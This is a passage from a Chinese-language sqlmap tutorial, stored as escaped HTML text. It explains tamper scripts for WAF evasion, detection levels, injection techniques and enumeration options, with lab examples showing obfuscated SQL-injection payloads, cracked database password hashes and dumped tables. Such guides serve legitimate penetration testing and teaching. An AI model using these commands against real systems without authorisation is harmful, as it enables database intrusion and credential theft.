1&quot;;<\/p>\n<h2>\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;tamper<\/p>\n<p>sqlmap\u9664\u4e86\u4f7f\u7528CHAR()\u51fd\u6570\u6765\u9632\u6b62\u51fa\u73b0\u5355\u5f15\u53f7\u4e4b\u5916\u6ca1\u6709\u5bf9\u6ce8\u5165\u7684\u6570\u636e\u4fee\u6539\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528&#8211;tamper\u53c2\u6570\u5bf9\u6570\u636e\u505a\u4fee\u6539\u6765\u7ed5\u8fc7WAF\u7b49\u8bbe\u5907\u3002<\/p>\n<p>\u4e0b\u9762\u662f\u4e00\u4e2atamper\u811a\u672c\u7684\u683c\u5f0f\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\"># Needed imports\nfrom lib.core.enums import PRIORITY\n# Define which is the order of application of tamper scripts against\n# the payload\n__priority__ = PRIORITY.NORMAL\ndef tamper(payload):\n    '''\n    Description of your tamper script\n    '''\n    retVal = payload\n    # your code to tamper the original payload\n    # return the tampered payload\n    return retVal<\/code><\/pre>\n<p>\u53ef\u4ee5\u67e5\u770b tamper\/ \u76ee\u5f55\u4e0b\u7684\u6709\u54ea\u4e9b\u53ef\u7528\u7684\u811a\u672c<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/mysql\/get_int.php?id=1\" --tamper\ntamper\/between.py,tamper\/randomcase.py,tamper\/space2comment.py -v 3\n[hh:mm:03] [DEBUG] cleaning up configuration 
parameters\n[hh:mm:03] [INFO] loading tamper script 'between'\n[hh:mm:03] [INFO] loading tamper script 'randomcase'\n[hh:mm:03] [INFO] loading tamper script 'space2comment'\n[...]\n[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[hh:mm:04] [PAYLOAD] 1)\/**\/And\/**\/1369=7706\/**\/And\/**\/(4092=4092\n[hh:mm:04] [PAYLOAD] 1)\/**\/AND\/**\/9267=9267\/**\/AND\/**\/(4057=4057\n[hh:mm:04] [PAYLOAD] 1\/**\/AnD\/**\/950=7041\n[...]\n[hh:mm:04] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause'\n[hh:mm:04] [PAYLOAD] 1\/**\/anD\/**\/(SELeCt\/**\/9921\/**\/fROm(SELeCt\/**\/counT(*),CONCAT(cHar(\n58,117,113,107,58),(SELeCt\/**\/(case\/**\/whEN\/**\/(9921=9921)\/**\/THeN\/**\/1\/**\/elsE\/**\/0\/**\/\nENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x\/**\/fROm\/**\/information_schema.tables\/**\/\ngroup\/**\/bY\/**\/x)a)\n[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING\nclause' injectable\n[...]<\/code><\/pre>\n<h1>\u63a2\u6d4b<\/h1>\n<h2>\u63a2\u6d4b\u7b49\u7ea7<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;level<\/p>\n<p>\u5171\u6709\u4e94\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a1\uff0csqlmap\u4f7f\u7528\u7684payload\u53ef\u4ee5\u5728xml\/payloads.xml\u4e2d\u770b\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6839\u636e\u76f8\u5e94\u7684\u683c\u5f0f\u6dfb\u52a0\u81ea\u5df1\u7684payload\u3002<\/p>\n<p>\u8fd9\u4e2a\u53c2\u6570\u4e0d\u4ec5\u5f71\u54cd\u4f7f\u7528\u54ea\u4e9bpayload\u540c\u65f6\u4e5f\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0cGET\u548cPOST\u7684\u6570\u636e\u90fd\u4f1a\u6d4b\u8bd5\uff0cHTTP Cookie\u5728level\u4e3a2\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\uff0c<\/p>\n<p>HTTP 
User-Agent\/Referer\u5934\u5728level\u4e3a3\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\u3002<\/p>\n<p>\u603b\u4e4b\u5728\u4f60\u4e0d\u786e\u5b9a\u54ea\u4e2apayload\u6216\u8005\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u7684\u65f6\u5019\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u5168\u9762\u6027\uff0c\u5efa\u8bae\u4f7f\u7528\u9ad8\u7684level\u503c\uff08\u4f46\u8bf7\u6c42\u91cf\u4f1a\u660e\u663e\u589e\u52a0\uff09\u3002<\/p>\n<h2>\u98ce\u9669\u7b49\u7ea7<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;risk<\/p>\n<p>\u5171\u6709\u4e09\u4e2a\u98ce\u9669\u7b49\u7ea7\uff081-3\uff09\uff0c\u9ed8\u8ba4\u662f1\u4f1a\u6d4b\u8bd5\u5927\u90e8\u5206\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c2\u4f1a\u589e\u52a0\u57fa\u4e8e\u65f6\u95f4\u7684\u91cd\u67e5\u8be2\uff08heavy query\uff09\u6d4b\u8bd5\u8bed\u53e5\uff0c3\u4f1a\u589e\u52a0OR\u8bed\u53e5\u7684SQL\u6ce8\u5165\u6d4b\u8bd5\u3002<\/p>\n<p>\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u4f8b\u5982\u5728UPDATE\u7684\u8bed\u53e5\u4e2d\uff0c\u6ce8\u5165\u4e00\u4e2aOR\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c\u53ef\u80fd\u5bfc\u81f4\u66f4\u65b0\u6574\u4e2a\u8868\uff0c\u53ef\u80fd\u9020\u6210\u5f88\u5927\u7684\u98ce\u9669\u3002<\/p>\n<p>\u6d4b\u8bd5\u7684\u8bed\u53e5\u540c\u6837\u53ef\u4ee5\u5728xml\/payloads.xml\u4e2d\u627e\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u81ea\u884c\u6dfb\u52a0payload\u3002<\/p>\n<h2>\u9875\u9762\u6bd4\u8f83<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;string,&#8211;not-string,&#8211;regexp,&#8211;code<\/p>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u901a\u8fc7\u5224\u65ad\u8fd4\u56de\u9875\u9762\u7684\u4e0d\u540c\u6765\u5224\u65ad\u771f\u5047\uff0c\u4f46\u6709\u65f6\u5019\u8fd9\u4f1a\u4ea7\u751f\u8bef\u5dee\uff0c\u56e0\u4e3a\u6709\u7684\u9875\u9762\u5728\u6bcf\u6b21\u5237\u65b0\u7684\u65f6\u5019\u90fd\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u4ee3\u7801\uff0c\u6bd4\u5982\u9875\u9762\u5f53\u4e2d\u5305\u542b\u4e00\u4e2a\u52a8\u6001\u7684\u5e7f\u544a\u6216\u8005\u5176\u4ed6\u5185\u5bb9\uff0c\u8fd9\u4f1a\u5bfc\u81f4sqlmap\u7684\u8bef\u5224\u3002\u6b64\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u4e2a\u5b57\u7b26\u4e32\u6216\u8005\u4e00\u6bb5\u6b63\u5219\u5339\u914d\uff0c\u5728\u539f\u59c
b\u9875\u9762\u4e0e\u771f<\/p>\n<p>\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u4e0d\u5b58\u5728\uff08\u4f7f\u7528&#8211;string\u53c2\u6570\u6dfb\u52a0\u5b57\u7b26\u4e32\uff0c&#8211;regexp\u6dfb\u52a0\u6b63\u5219\uff09\uff0c\u540c\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u6bb5\u5b57\u7b26\u4e32\u5728<\/p>\n<p>\u539f\u59cb\u9875\u9762\u4e0e\u771f\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u4e0d\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff08&#8211;not-string\u6dfb\u52a0\uff09\u3002\u7528\u6237\u4e5f\u53ef\u4ee5\u63d0\u4f9b\u771f\u4e0e\u5047\u6761\u4ef6\u8fd4\u56de\u7684HTTP<\/p>\n<p>\u72b6\u6001\u7801\u4e0d\u4e00\u6837\u6765\u6ce8\u5165\uff0c\u4f8b\u5982\uff0c\u54cd\u5e94200\u7684\u65f6\u5019\u4e3a\u771f\uff0c\u54cd\u5e94401\u7684\u65f6\u5019\u4e3a\u5047\uff0c\u53ef\u4ee5\u6dfb\u52a0\u53c2\u6570&#8211;code=200\u3002<\/p>\n<p>\u53c2\u6570\uff1a&#8211;text-only,&#8211;titles<\/p>\n<p>\u6709\u4e9b\u65f6\u5019\u7528\u6237\u77e5\u9053\u771f\u6761\u4ef6\u4e0b\u7684\u8fd4\u56de\u9875\u9762\u4e0e\u5047\u6761\u4ef6\u4e0b\u8fd4\u56de\u9875\u9762\u662f\u4e0d\u540c\u4f4d\u7f6e\u5728\u54ea\u91cc\u53ef\u4ee5\u4f7f\u7528&#8211;text-only\uff08HTTP\u54cd\u5e94\u4f53\u4e2d\u4e0d\u540c\uff09&#8211;titles\uff08HTML\u7684<\/p>\n<p>title\u6807\u7b7e\u4e2d\u4e0d\u540c\uff09\u3002<\/p>\n<h1>\u6ce8\u5165\u6280\u672f<\/h1>\n<h2>\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;technique<\/p>\n<p>\u8fd9\u4e2a\u53c2\u6570\u53ef\u4ee5\u6307\u5b9asqlmap\u4f7f\u7528\u7684\u63a2\u6d4b\u6280\u672f\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u4f1a\u6d4b\u8bd5\u6240\u6709\u7684\u65b9\u5f0f\u3002<\/p>\n<p>\u652f\u6301\u7684\u63a2\u6d4b\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n<p>B: Boolean-based blind SQL injection\uff08\u5e03\u5c14\u578b\u6ce8\u5165\uff09<\/p>\n<p>E: Error-based SQL 
injection\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09<\/p>\n<p>U: UNION query SQL injection\uff08\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n<p>S: Stacked queries SQL injection\uff08\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n<p>T: Time-based blind SQL injection\uff08\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165\uff09<\/p>\n<p>Q: Inline queries\uff08\u5185\u8054\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n<h2>\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;time-sec<\/p>\n<p>\u5f53\u4f7f\u7528\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528&#8211;time-sec\u53c2\u6570\u8bbe\u5b9a\u5ef6\u65f6\u65f6\u95f4\uff0c\u9ed8\u8ba4\u662f5\u79d2\uff0c\u7f51\u7edc\u5ef6\u8fdf\u8f83\u5927\u65f6\u5e94\u9002\u5f53\u8c03\u9ad8\uff0c\u5426\u5219\u5bb9\u6613\u8bef\u5224\u3002<\/p>\n<h2>\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;union-cols<\/p>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u6d4b\u8bd5UNION\u67e5\u8be2\u6ce8\u5165\u4f1a\u6d4b\u8bd51-10\u4e2a\u5b57\u6bb5\u6570\uff0c\u5f53&#8211;level\u4e3a5\u7684\u65f6\u5019\u4ed6\u4f1a\u589e\u52a0\u6d4b\u8bd5\u523050\u4e2a\u5b57\u6bb5\u6570\u3002\u8bbe\u5b9a&#8211;union-cols\u7684\u503c\u5e94\u8be5\u662f\u4e00\u6bb5\u6574\u6570\uff0c\u5982\uff1a12-16\uff0c\u662f\u6d4b\u8bd512-16\u4e2a\u5b57\u6bb5\u6570\u3002<\/p>\n<h2>\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;union-char<\/p>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u9488\u5bf9UNION\u67e5\u8be2\u7684\u6ce8\u5165\u4f1a\u4f7f\u7528NULL\u5b57\u7b26\uff0c\u4f46\u662f\u6709\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u9020\u6210\u9875\u9762\u8fd4\u56de\u5931\u8d25\uff0c\u800c\u4e00\u4e2a\u968f\u673a\u6574\u6570\u662f\u6210\u529f\u7684\uff0c\u8fd9\u65f6\u4f60\u53ef\u4ee5\u7528&#8211;union-char\u6307\u5b9aUNION\u67e5\u8be2\u7684\u5b57\u7b26\u3002<\/p>\n<h2>\u4e8c\u9636SQL\u6ce8\u5165<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;second-order<\/p>\n<p>\u6709\u4e9b\u65f6\u5019\u6ce8\u5165\u70b9\u8f93\u5165\u7684\u6570\u636e\u770b\u8fd4\u56de\u7ed3\u679c\u7684\u65f6\u5019\u5e76\u4e0d\u662f\u5f53\u524d\u7684\u9875\u976
2\uff0c\u800c\u662f\u53e6\u5916\u7684\u4e00\u4e2a\u9875\u9762\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u4f60\u6307\u5b9a\u5230\u54ea\u4e2a\u9875\u9762\u83b7\u53d6\u54cd\u5e94\u5224\u65ad\u771f\u5047\u3002&#8211;second-order\u540e\u9762\u8ddf\u4e00\u4e2a\u5224\u65ad\u9875\u9762\u7684URL\u5730\u5740<\/p>\n<h1>\u5217\u6570\u636e<\/h1>\n<h2>\u6807\u5fd7<\/h2>\n<p>\u53c2\u6570\uff1a-b,&#8211;banner<\/p>\n<p>\u5927\u591a\u6570\u7684\u6570\u636e\u5e93\u7cfb\u7edf\u90fd\u6709\u4e00\u4e2a\u51fd\u6570\u53ef\u4ee5\u8fd4\u56de\u6570\u636e\u5e93\u7684\u7248\u672c\u53f7\uff0c\u901a\u5e38\u8fd9\u4e2a\u51fd\u6570\u662fversion()\u6216\u8005\u53d8\u91cf@@version\uff0c\u8fd9\u4e3b\u8981\u53d6\u51b3\u4e8e\u662f\u4ec0\u4e48\u6570\u636e\u5e93\u3002<\/p>\n<h2>\u7528\u6237<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;current-user<\/p>\n<p>\u5728\u5927\u591a\u6570\u6570\u636e\u5e93\u4e2d\u53ef\u4ee5\u83b7\u53d6\u5230\u7ba1\u7406\u6570\u636e\u7684\u7528\u6237\u3002<\/p>\n<h2>\u5f53\u524d\u6570\u636e\u5e93<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;current-db<\/p>\n<p>\u8fd4\u56de\u5f53\u524d\u8fde\u63a5\u7684\u6570\u636e\u5e93\u3002<\/p>\n<h2>\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u5458<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;is-dba<\/p>\n<p>\u5224\u65ad\u5f53\u524d\u7684\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u5458\uff0c\u662f\u7684\u8bdd\u4f1a\u8fd4\u56deTrue\u3002<\/p>\n<h2>\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;users<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5c31\u53ef\u4ee5\u5217\u51fa\u6240\u6709\u7ba1\u7406\u7528\u6237\u3002<\/p>\n<h2>\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;passwords<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u7528\u6237\u5bc6\u7801\u7684\u8868\u7684\u6743\u9650\u65f6\uff0csqlmap\u4f1a\u5148\u5217\u4e3e\u51fa\u7528\u6237\uff0c\u7136\u540e\u5217\u
51fahash\uff0c\u5e76\u5c1d\u8bd5\u7834\u89e3\u3002<\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1\" --passwords -v 1\n[...]\nback-end DBMS: PostgreSQL\n[hh:mm:38] [INFO] fetching database users password hashes\ndo you want to use dictionary attack on retrieved password hashes? [Y\/n\/q] y\n[hh:mm:42] [INFO] using hash method: 'postgres_passwd'\nwhat's the dictionary's location? [\/software\/sqlmap\/txt\/wordlist.txt]\n[hh:mm:46] [INFO] loading dictionary from: '\/software\/sqlmap\/txt\/wordlist.txt'\ndo you want to use common password suffixes? (slow!) [y\/N] n\n[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)\n[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'\n[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'\ndatabase management system users password hashes:\n[*] postgres [1]:\npassword hash: md5d7d880f96044b72d0bba108ace96d1e4\nclear-text password: testpass\n[*] testuser [1]:\npassword hash: md599e5ea7a6f7c3269995cba3927fd0093\nclear-text password: testpass<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230sqlmap\u4e0d\u4ec5\u52d2\u51fa\u6570\u636e\u5e93\u7684\u7528\u6237\u8ddf\u5bc6\u7801\uff0c\u540c\u65f6\u4e5f\u8bc6\u522b\u51fa\u662fPostgreSQL\u6570\u636e\u5e93\uff0c\u5e76\u8be2\u95ee\u7528\u6237\u662f\u5426\u91c7\u7528\u5b57\u5178\u7206\u7834\u7684\u65b9\u5f0f\u8fdb\u884c\u7834\u89e3\uff0c\u8fd9\u4e2a<\/p>\n<p>\u7206\u7834\u5df2\u7ecf\u652f\u6301Oracle\u548cMicrosoft SQL 
Server\u3002<\/p>\n<p>\u4e5f\u53ef\u4ee5\u63d0\u4f9b-U\u53c2\u6570\u6765\u6307\u5b9a\u7206\u7834\u54ea\u4e2a\u7528\u6237\u7684hash<\/p>\n<h2>\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;privileges<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u6743\u9650\uff0csqlmap\u5c06\u4f1a\u544a\u8bc9\u4f60\u54ea\u4e2a\u662f\u6570\u636e\u5e93\u7684\u8d85\u7ea7\u7ba1\u7406\u5458\u3002\u4e5f\u53ef\u4ee5<\/p>\n<p>\u7528-U\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u6743\u9650\u3002<\/p>\n<h2>\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;roles<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u89d2\u8272\uff0c\u4e5f\u53ef\u4ee5\u7528-U\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u89d2\u8272\u3002<\/p>\n<p>\u4ec5\u9002\u7528\u4e8e\u5f53\u524d\u6570\u636e\u5e93\u662fOracle\u7684\u65f6\u5019\u3002<\/p>\n<h2>\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;dbs<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u5217\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6240\u6709\u7684\u6570\u636e\u5e93\u3002<\/p>\n<h2>\u5217\u4e3e\u6570\u636e\u5e93\u8868<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;tables,&#8211;exclude-sysdbs,-D<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u4e00\u4e2a\u7279\u5b9a\u6570\u636e\u7684\u6240\u6709\u8868\u3002<\/p>\n<p
>\u5982\u679c\u4f60\u4e0d\u63d0\u4f9b-D\u53c2\u6570\u6765\u5217\u6307\u5b9a\u7684\u4e00\u4e2a\u6570\u636e\u5e93\u7684\u65f6\u5019\uff0csqlmap\u4f1a\u5217\u51fa\u6570\u636e\u5e93\u6240\u6709\u5e93\u7684\u6240\u6709\u8868\u3002<\/p>\n<p>&#8211;exclude-sysdbs\u53c2\u6570\u662f\u6307\u6392\u9664\u6240\u6709\u7684\u7cfb\u7edf\u6570\u636e\u5e93\uff08\u4e0d\u5217\u4e3e\u7cfb\u7edf\u5e93\u4e2d\u7684\u8868\uff09\u3002<\/p>\n<p>\u9700\u8981\u6ce8\u610f\u7684\u662f\u5728Oracle\u4e2d\u4f60\u9700\u8981\u63d0\u4f9b\u7684\u662fTABLESPACE_NAME\u800c\u4e0d\u662f\u6570\u636e\u5e93\u540d\u79f0\u3002<\/p>\n<h2>\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;columns,-C,-T,-D<\/p>\n<p>\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6307\u5b9a\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5\uff0c\u540c\u65f6\u4e5f\u4f1a\u5217\u51fa\u5b57\u6bb5\u7684\u6570\u636e\u7c7b\u578b\u3002<\/p>\n<p>\u5982\u679c\u6ca1\u6709\u4f7f\u7528-D\u53c2\u6570\u6307\u5b9a\u6570\u636e\u5e93\u65f6\uff0c\u9ed8\u8ba4\u4f1a\u4f7f\u7528\u5f53\u524d\u6570\u636e\u5e93\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aSQLite\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/sqlite\/get_int.php?id=1\" --columns -D testdb -T users -C\nname\n[...]\nDatabase: SQLite_masterdb\nTable: users\n[3 columns]\n+---------+---------+\n| Column  | Type    |\n+---------+---------+\n| id      | INTEGER |\n| name    | TEXT    |\n| surname | TEXT    
|\n+---------+---------+<\/code><\/pre>\n<h2>\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;schema,&#8211;exclude-sysdbs<\/p>\n<p>\u7528\u6237\u53ef\u4ee5\u7528\u6b64\u53c2\u6570\u83b7\u53d6\u6570\u636e\u5e93\u7684\u67b6\u6784\uff0c\u5305\u542b\u6240\u6709\u7684\u6570\u636e\u5e93\uff0c\u8868\u548c\u5b57\u6bb5\uff0c\u4ee5\u53ca\u5404\u81ea\u7684\u7c7b\u578b\u3002<\/p>\n<p>\u52a0\u4e0a&#8211;exclude-sysdbs\u53c2\u6570\uff0c\u5c06\u4e0d\u4f1a\u83b7\u53d6\u6570\u636e\u5e93\u81ea\u5e26\u7684\u7cfb\u7edf\u5e93\u5185\u5bb9\u3002<\/p>\n<p>MySQL\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.48.130\/sqlmap\/mysql\/get_int.php?id=1\" --schema --batch --exclude-sysdbs\n[...]\nDatabase: owasp10\nTable: accounts\n[4 columns]\n+-------------+---------+\n| Column      | Type    |\n+-------------+---------+\n| cid         | int(11) |\n| mysignature | text    |\n| password    | text    |\n| username    | text    |   \n+-------------+---------+\nDatabase: owasp10\nTable: blogs_table\n[4 columns]\n+--------------+----------+\n| Column       | Type     |\n+--------------+----------+\n| date         | datetime |\n| blogger_name | text     |\n| cid          | int(11)  |\n| comment      | text     |\n+--------------+----------+\nDatabase: owasp10\nTable: hitlog\n[6 columns]\n+----------+----------+\n| Column   | Type     |\n+----------+----------+\n| date     | datetime |\n| browser  | text     |\n| cid      | int(11)  |\n| hostname | text     |\n| ip       | text     |\n| referer  | text     |\n+----------+----------+\nDatabase: testdb\nTable: users\n[3 columns]\n+---------+---------------+\n| Column  | Type          |\n+---------+---------------+\n| id      | int(11)       |\n| name    | varchar(500)  |\n| surname | varchar(1000) 
|\n+---------+---------------+\n[...]<\/code><\/pre>\n<h2>\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;count<\/p>\n<p>\u6709\u65f6\u5019\u7528\u6237\u53ea\u60f3\u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\u4e2a\u6570\u800c\u4e0d\u662f\u5177\u4f53\u7684\u5185\u5bb9\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aMicrosoft SQL Server\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1\" --count -D testdb\n[...]\nDatabase: testdb\n+----------------+---------+\n| Table          | Entries |\n+----------------+---------+\n| dbo.users      |     4   |\n| dbo.users_blob |     2   |\n+----------------+---------+<\/code><\/pre>\n<h2>\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;dump,-C,-T,-D,&#8211;start,&#8211;stop,&#8211;first,&#8211;last<\/p>\n<p>\u5982\u679c\u5f53\u524d\u7ba1\u7406\u5458\u6709\u6743\u9650\u8bfb\u53d6\u6570\u636e\u5e93\u5176\u4e2d\u7684\u4e00\u4e2a\u8868\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u80fd\u83b7\u53d6\u771f\u4e2a\u8868\u7684\u6240\u6709\u5185\u5bb9\u3002<\/p>\n<p>\u4f7f\u7528-D,-T\u53c2\u6570\u6307\u5b9a\u60f3\u8981\u83b7\u53d6\u54ea\u4e2a\u5e93\u7684\u54ea\u4e2a\u8868\uff0c\u4e0d\u9002\u7528-D\u53c2\u6570\u65f6\uff0c\u9ed8\u8ba4\u4f7f\u7528\u5f53\u524d\u5e93\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aFirebird\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/firebird\/get_int.php?id=1\" --dump -T users\n[...]\nDatabase: Firebird_masterdb\nTable: USERS\n[4 entries]\n+----+--------+------------+\n| ID | NAME   | SURNAME    |\n+----+--------+------------+\n| 1  | luther | blisset    |\n| 2  | fluffy | bunny      |\n| 3  | wu     | ming       |\n| 4  | NULL   | nameisnull 
